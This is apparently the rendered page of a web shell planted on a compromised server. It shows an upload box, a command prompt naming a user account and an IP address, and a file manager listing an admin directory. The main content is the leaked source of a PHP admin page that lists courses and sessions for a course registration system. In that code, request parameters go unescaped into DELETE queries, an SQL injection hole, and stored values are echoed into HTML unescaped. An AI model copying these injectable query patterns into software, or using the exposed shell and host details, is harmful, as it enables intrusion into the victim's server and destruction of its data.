[ Avaa Bypassed ]

Upload:

Command:

hmhc3928@18.191.192.250: ~ $ 
<?php
	$page_title = "Courses List | CES Admin";
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/common_functions.php"); //common functions in the course registartion system
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/config.php"); //holds global config variables
 	check_if_authenticated('admin');//check if user is logged in
	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/top-admin.php"); //get the HTML heading common to all pages in the CES admin module
	
?>

 <article class="ces-admin">
        <h2>CES Admin - Course List</h2>

<?php 
include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/nav-admin.php"); //get the HTML nav common to all pages in the CES admin module
	//opens connection to database
	$db = mysqli_connect($mysql_server, $user, $pass, $database);


	if(isset($_POST['delete'])){
		$delete_course_sql = "DELETE FROM ces_courses WHERE course_id = '$_POST[course_id]'";
		
		if (mysqli_query($db, $delete_course_sql)) {
			if (isset($_POST['course_name']) && $_POST['course_name'] > ''){
				echo "<p class='alert alert-success'>The Course <em>".$_POST['course_name']."</em> was deleted successfully</p>\n";
			}
			else{
				echo "<p class='alert alert-success'>The Course was deleted successfully</p>\n";
			}			
		}
		else{
			print_sql_error('Error - could not delete the course when trying to do:', $sql);
		}

	}

	if(isset($_GET['action']) && $_GET['action']=='delete_session' && isset($_GET['session_id'])){
		$delete_session_sql = "DELETE FROM ces_sessions WHERE session_id = '$_GET[session_id]'";
		$delete_instructor_sql = "DELETE FROM ces_instructors_to_sessions WHERE session_id = '$_GET[session_id]'";

		if (mysqli_query($db, $delete_session_sql)) {
			if (mysqli_query($db, $delete_instructor_sql)){
				echo "<p class='alert alert-success'>Session deleted successfully</p>\n";
			}
			else{
				echo "<p class='alert alert-error'>Session deleted successfully, however there was an error unlinking the Instructors:<br> " . mysqli_error($db). "</p>\n";
			}
		    
		} else {
		    echo "<p class='alert alert-error'>Error deleting Session:<br> " . mysqli_error($db). "</p>\n";
		}

	}


	if(isset($_GET['action']) && $_GET['action']=='lock_session' && isset($_GET['session_id'])){
		if (lock_session($_GET['session_id'])) {
			echo "<p class='alert alert-success'>Session locked successfully</p>\n";		    
		} else {
		    echo "<p class='alert alert-error'>Error locking Session</p>\n";
		}
	}

	if(isset($_GET['action']) && $_GET['action']=='open_session' && isset($_GET['session_id'])){
		if (open_session($_GET['session_id'])) {
			echo "<p class='alert alert-success'>Session opened successfully</p>\n";		    
		} else {
		    echo "<p class='alert alert-error'>Error opening Session</p>\n";
		}
	}


	if(isset($_GET['action']) && $_GET['action']=='hide_session' && isset($_GET['session_id'])){
		if (hide_session($_GET['session_id'])) {
			echo "<p class='alert alert-success'>Session hidden successfully from the public.</p>\n";		    
		} else {
		    echo "<p class='alert alert-error'>Error hiding session. Session is still showing.</p>\n";
		}
	}

	if(isset($_GET['action']) && $_GET['action']=='show_session' && isset($_GET['session_id'])){
		if (show_session($_GET['session_id'])) {
			echo "<p class='alert alert-success'>Session is now showing to the public.</p>\n";		    
		} else {
		    echo "<p class='alert alert-error'>Error showing session. Session is still hidden.</p>\n";
		}
	}

	


	if(isset($_GET['active'])){
		$_SESSION["active"] = $_GET['active'];
	}
	echo "<div class='ces-course-list-active-buttons'>";
	if(isset($_SESSION['active'])){
		if($_SESSION['active']=='yes'){
			$course_active = "WHERE course_active = 1";			
			echo '<span title="List Active Courses Only" class="btn btn-lg btn-block ces-grey-btn cursor-arrow">Active</span>';
			echo '<a href="?active=no" title="List Inactive Courses Only" class="btn btn-lg btn-block ces-orange-btn">Inactive</a>';
			echo '<a href="?active=all" title="List All Courses" class="btn btn-lg btn-block ces-orange-btn">All</a>';
		}
		elseif($_SESSION['active']=='no'){
			$course_active = "WHERE course_active = 0";	
			echo '<a href="?active=yes" title="List Active Courses Only" class="btn btn-lg btn-block ces-orange-btn">Active</a>';
			echo '<span title="List Inactive Courses Only" class="btn btn-lg btn-block ces-grey-btn cursor-arrow">Inactive</span>';
			echo '<a href="?active=all" title="List All Courses" class="btn btn-lg btn-block ces-orange-btn">All</a>';
		}elseif($_SESSION['active'] == 'all'){
			$course_active = "";
			echo '<a href="?active=yes" title="List Active Courses Only" class="btn btn-lg btn-block ces-orange-btn">Active</a>';
			echo '<a href="?active=no" title="List Inactive Courses Only" class="btn btn-lg btn-block ces-orange-btn">Inactive</a>';
			echo '<span title="List All Courses" class="btn btn-lg btn-block ces-grey-btn">All</span>';	
		}
	}else{
		$course_active = "WHERE course_active = 1";			
		echo '<span title="List Active Courses Only" class="btn btn-lg btn-block ces-grey-btn cursor-arrow">Active</span>';
		echo '<a href="?active=no" title="List Inactive Courses Only" class="btn btn-lg btn-block ces-orange-btn">Inactive</a>';	
		echo '<a href="?active=all" title="List All Courses" class="btn btn-lg btn-block ces-orange-btn">All</a>';
	}
	echo "</div>";


	//echo var_dump($_SESSION);

	//show courses and related sessions
	//only show sessions that are less than two years old (determined by the session's end_dt) and those that are not offered in video conference locations (show the main location, should only be one)
	// $course_sql = mysqli_query($db, "SELECT course.course_id, course.course_name, course.course_description, course.course_active, level.level_description,
	// (SELECT IFNULL(MIN(start_dt), STR_TO_DATE('12/31/9999', '%m/%d/%Y')) 
	// 	FROM ces_sessions session 
	// 	WHERE session.course_id = course.course_id 
	// 	AND session.start_dt >= now()) start_dt
	// FROM ces_courses course	
	// LEFT OUTER JOIN ces_levels level ON level.level_id = course.level_id
	// $course_active
	// ORDER BY start_dt, course.course_name");
	
	$course_sql = mysqli_query($db, "SELECT course.course_id, course.course_name, course.course_description, course.course_active,
	(SELECT IFNULL(MIN(start_dt), STR_TO_DATE('12/31/9999', '%m/%d/%Y')) 
		FROM ces_sessions session 
		WHERE session.course_id = course.course_id
		AND session.start_dt >= now()) start_dt		
	FROM ces_courses course
	$course_active
	ORDER BY start_dt, course.course_name");

	//output the query results in html table format
	while ($course_query = mysqli_fetch_array($course_sql)) {

		$session_count_sql = mysqli_query($db, "SELECT session_id FROM ces_sessions WHERE course_id = '$course_query[course_id]'");
		$session_count = mysqli_num_rows($session_count_sql);

		echo "\n<table class='ces-course-table' width='100%' border='0' cellspacing='0' cellpadding='5'>";
        echo "\n\t<tr id='".$course_query["course_id"]."'>";
        echo "\n\t<td>";
		echo "\n\t<table border='0' align='center' width='100%' cellspacing='0' cellpadding='5'>"; //table for courses and related sessions
		//output the course
		echo "\n\t\t<tr>\n\t<td><h5 title='Course ID: ".$course_query["course_id"]."'>" . $course_query["course_name"] . "</h5></td>";
		echo "\n\t\t<td class='ces-course-list-icons' width='15%'>";

		echo "<a href='edit.php?course_id=" . $course_query["course_id"] . "'><span title='Edit Course' class='fa fa-pencil fa-lg blue-icon'></span></a>";
		echo "<a href='../sessions/add.php?course_id=" . $course_query["course_id"] . "'><span title='Add Session' class='fa fa-plus fa-lg blue-icon'></span></a>";
		echo "</td>\n\t\t</tr>\n\t</table>";
		
		//if course has sessions, display a table of them
		if($session_count > 0){
			echo "\n<table class='ces-course-sessions' width='100%' border='0' cellpadding='5' cellspacing='0'>";
			echo "\n\t<thead><tr>";
			echo "\n\t<th height='25' class='ces-courses-start'>Start</th>";
			echo "\n\t<th height='25' class='ces-courses-end'>End</th>";
			echo "\n\t<th height='25' class='ces-courses-location'>Session Info</th>";
			echo "\n\t<th height='25' class='ces-courses-telehealth'>Type</th>";
			echo "\n\t<th height='25' class='ces-courses-seats'>Seats</th>";
			echo "\n\t<th height='25' class='ces-courses-waitlist'>Waitlist</th>";
			echo "\n\t<th height='25' class='ces-courses-options'>Session Options</th>";
			echo "\n\t</tr></thead>";
			echo "\n\t<tbody>";
			
			//2015-07-15 - nwmosses - removed 'AND location.telehealth = 0', so sessions with one telehealth location will show on the list
			//2015-07-15 - nwmosses - telehealth and location info now coming from ces_sessions
			//

			$session_sql = mysqli_query($db, "SELECT session.session_id, unix_timestamp(session.start_dt) as start_dt, unix_timestamp(session.end_dt) as end_dt, session.telehealth, session.cancelled, session.open, session.display, session.webex_meeting_key, session.webex_url, location.location_id, location.location_name, location.seats
			FROM ces_sessions session
			LEFT OUTER JOIN ces_locations location ON location.location_id = session.location_id
			WHERE session.course_id = '$course_query[course_id]'
			AND DATE_ADD(session.end_dt, INTERVAL 20 YEAR) >= now()
			ORDER BY session.start_dt DESC, session.end_dt DESC, location.location_name");
			
			
			while ($session_query = mysqli_fetch_array($session_sql)) { //output the session information - one session per table row
				
				$session_type = session_type($session_query['session_id']);


				if($session_query['cancelled'] == 1){
					echo "\n\t<tr class='ces-session-cancelled' title='Session ID: ".$session_query['session_id']."\nSession has been cancelled.'>";
				}elseif($session_type === 'recorded'){
					echo "\n\t<tr class='ces-session-online' title='Session ID: ".$session_query['session_id']."\nThis is an Recorded Session.'>";
				}else{
					echo "\n\t<tr title='Session ID: ".$session_query['session_id']."'>";
				}
				echo "\n\t<td class='ces-courses-start'>" . date($default_date_format, $session_query["start_dt"]) . "</td>";
				echo "\n\t<td class='ces-courses-end'>" . date($default_date_format, $session_query["end_dt"]) . "</td>";
				//echo "\n\t<td valign='top' bgcolor='#FFFFFF' class='CEStext'>";
				echo "\n\t<td class='ces-courses-location'>";
				if($session_type === 'recorded'){
					echo "<a href='".get_session_link($session_query["session_id"])."'>Video Link</a>";
				}elseif($session_type === 'webex'){
					if($session_query['webex_url'] === ''){
						echo "<span class='red'>No Attendee Event Address</span>";
					}
					else{
						echo "<a href='".$session_query['webex_url']."' title='".$session_query['webex_url']."' target='_blank'>Meeting Key: ".$session_query['webex_meeting_key']."</a>";
					}
				}else{
					output_map_link($session_query['location_id']);
				}
				echo "</td>";
				$seats = $session_query["seats"];
				$attendees = registered_seats($session_query["session_id"]) + registered_guests($session_query["session_id"]);
				$percent_full = 0;
				if($seats > 0 && $attendees > 0){
					$percent_full = 100*$attendees/$seats;
				}
						        
				if($session_type === 'telehealth'){ 
					echo "\n\t<td class='ces-courses-telehealth'>";
					$video_attendees = registered_video($session_query["session_id"]);
					$audio_attendees = registered_audio($session_query["session_id"]);
					$telehealth_attendees = $video_attendees+$audio_attendees;
					echo "<span title='Video: ".$video_attendees.", Audio: ".$audio_attendees."'>Telehealth (".$telehealth_attendees.")</span>";
					echo "</td>";
				}//if
				elseif($session_type === 'recorded'){
					echo "\n\t<td class='ces-courses-telehealth' title='This is an recorded course.'>Recorded</td>";
				}//elseif
				elseif($session_type === 'webex'){
					echo "\n\t<td class='ces-courses-telehealth' title='This is an webex course.'>WebEx</td>";
				}//elseif
				else{
					echo "\n\t<td class='ces-courses-telehealth' title='This is an In Person only session.'>In Person</td>";
				}//else

				if($session_type === 'recorded' || $session_type === 'webex'){
					echo "\n\t<td class='ces-courses-seats' title='Users Registered'>" .$attendees."</td>";
					echo "\n\t<td class='ces-courses-waitlist' title='No Waitlist Needed'>n/a</td>";
				}
				else{
					echo "\n\t<td class='ces-courses-seats' title='".$percent_full."%'>" .$attendees."/". $seats . "</td>";
					echo "\n\t<td class='ces-courses-waitlist'  title='Number of Users on Waitlist'>" .registered_waitlist($session_query["session_id"]) . "</td>";
				}

				

				
				echo "\n<td class='ces-course-options ces-courses-options'>";
				
				//echo "<a href='edit_session.php?session_id=" . $session_query["session_id"] . "'><span class='fa fa-edit orange-icon' title='Edit Session'></span></a>";
				echo "<a href='../sessions/edit.php?session_id=" . $session_query["session_id"] . "'><span class='fa fa-edit orange-icon' title='Edit Session'></span></a>";
				echo "<a href='../users/search.php?session_id=" . $session_query["session_id"] . "'><span class='fa fa-user   orange-icon' title='Register Person'></span></a>";
				echo "<a href='../sessions/attendees.php?session_id=" . $session_query["session_id"] . "'><span class='fa fa-list orange-icon' title='List Attendees Person'></span></a>";
				echo "<a href='/course_registration/report_session.php?session_id=" . $session_query["session_id"] . "'><span class='fa fa-line-chart orange-icon' title='Session Reports'></span></a>";
				
				if($session_query["open"])
					echo "<a href='?session_id=". $session_query["session_id"]."&action=lock_session#".$course_query['course_id']."'><span class='fa fa-check-circle green-icon' title='Session is currently open. Click to lock registration for this session.'></span></a>";
				else
					echo "<a href='?session_id=". $session_query["session_id"]."&action=open_session#".$course_query['course_id']."'><span class='fa fa-lock red-icon' title='Session is currently locked. Click to open Session'></span></a>";
				if($session_query["display"])
					echo "<a href='?session_id=". $session_query["session_id"]."&action=hide_session#".$course_query['course_id']."'><span class='fa fa-eye green-icon' title='This session is viewable '></span></a>";
				else
					echo "<a href='?session_id=". $session_query["session_id"]."&action=show_session#".$course_query['course_id']."'><span class='fa fa-eye-slash red-icon' title='Show Session'></span></a>";
				
			} //while			
			echo "\n</tbody>";
			echo "\n</table>";
		}else{
			echo "<a href='../sessions/add.php?course_id=" . $course_query["course_id"] . "' class='btn btn-lg ces-green-btn' style='margin-left:10px;'>Add a Session</a>";
			echo "\n<form style='display:inline-block' method='post' action='" . $_SERVER['PHP_SELF'] . "'>";
			echo '<button class="btn btn-lg ces-red-btn" type="submit" name="delete" value="Delete" title="Delete Empty Course" style="font-size:14px;">Delete Empty Course</button>';
			echo '<input type="hidden" name="course_id" value="'. $course_query["course_id"].'">';
			echo '<input type="hidden" name="course_name" value="'. $course_query["course_name"].'">';
			echo '</form>';
		}
		echo "\n</td></tr></table>";
		echo "<div class='ces-back-to-top'><a href=#top>Back to Top</a></div>";
	} //while

?>
<script type="text/javascript">
// 	$(document).ready(function(){
//     	$('table.ces-course-sessions').DataTable({
//     		paging:false,
// 	    	searching:false,
// 	    	info:false,
// 		  "columnDefs": [
// 		    { "orderable": false, "targets": 5 }
// 		  ]
// 		});
// 	});
 </script>

 
  </article>
    


  </section><!-- #middle-->

</div><!-- #wrapper --> 
 
<?php require_once $_SERVER['DOCUMENT_ROOT'].'/require/footer.php';?>

Filemanager

DIR : / home/ hmhc3928/ public_html_community/ admin/ courses/
Name Type Size Permission Actions
add.php File 3.2 KB 0644
edit.php File 4.01 KB 0644
error_log File 126.8 KB 0644
index.php File 15.4 KB 0644